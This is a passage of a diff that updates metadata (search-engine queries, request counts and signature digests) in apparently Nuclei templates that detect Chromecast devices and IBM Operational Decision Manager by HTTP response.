+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - 'image/svg+xml'
+
+      - type: status
+        status:
+          - 200
+# digest: 4a0a0047304502203f1f9450ea215136ca621ee9dbedce3ae4455abcc8dd73db23c5e0cdde586076022100f02e51d462db656b75f00a878d4608aed164f4cc5492a86cb73fd88a1665a085:922c64590222798bb761d5b6d8e72950

http/technologies/google/chromecast-detect.yaml

@@ -10,8 +10,9 @@ info:
     - https://github.com/thewhiteh4t/killcast/blob/ee81cfa03c963d47d3335770fcea2ca48bddeabf/killcast.py#L100C25-L100C43
     - https://rithvikvibhu.github.io/GHLocalApi/#section/Google-Home-Local-API/Authentication
   metadata:
-    shodan-query: "Chromecast"
     verified: true
+    max-request: 1
+    shodan-query: Chromecast
   tags: google,chromecast,detect
 
 http:
@@ -32,4 +33,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a004730450221009d996dd528a6470315f3ef08c7de657ec6203185d235eb7877324aeb51c17c29022078f0723a1a04cc66cea30f0a15c736c5701e1062d0d40436d5f177e847865396:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a0047304502206c214513406d47d4e688761e11149e983c02c3e47bdfa1f4d01fab2aa15ff11d0221009b017586aea846fc0befea354637be19778ec8c58b0fb2c49e2f28e65855dc2a:922c64590222798bb761d5b6d8e72950

http/technologies/ibm/ibm-odm-detect.yaml

@@ -10,7 +10,8 @@ info:
     - https://www.ibm.com/products/operational-decision-manager
   metadata:
     verified: true
-    fofa-query: icon_hash="707491698"
+    fofa-query: "icon_hash=\"707491698\""
+    max-request: 1
   tags: ibm,decision-center,tech,detect
 
 http:
@@ -28,4 +29,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100a59aa313dd5de76ccd37ff23f84ea70c006cf6902d856db566f35dd35a4091250221008aa670d5443398d03af2bd250cf3d43d379ff8c32783e9f9de3bb9c7af63ad0e:922c64590222798bb761d5b6d8e72950
+# digest: 490a004630440220145ded2786c1d6f03455e511dd78e011fec59080659837fcc214ab4d5fa13b930220173f1a21d9016bd6415376e6b6963b1964e29cc705c87c6b10ee14d6f0eeb176:922c64590222798bb761d5b6d8e72950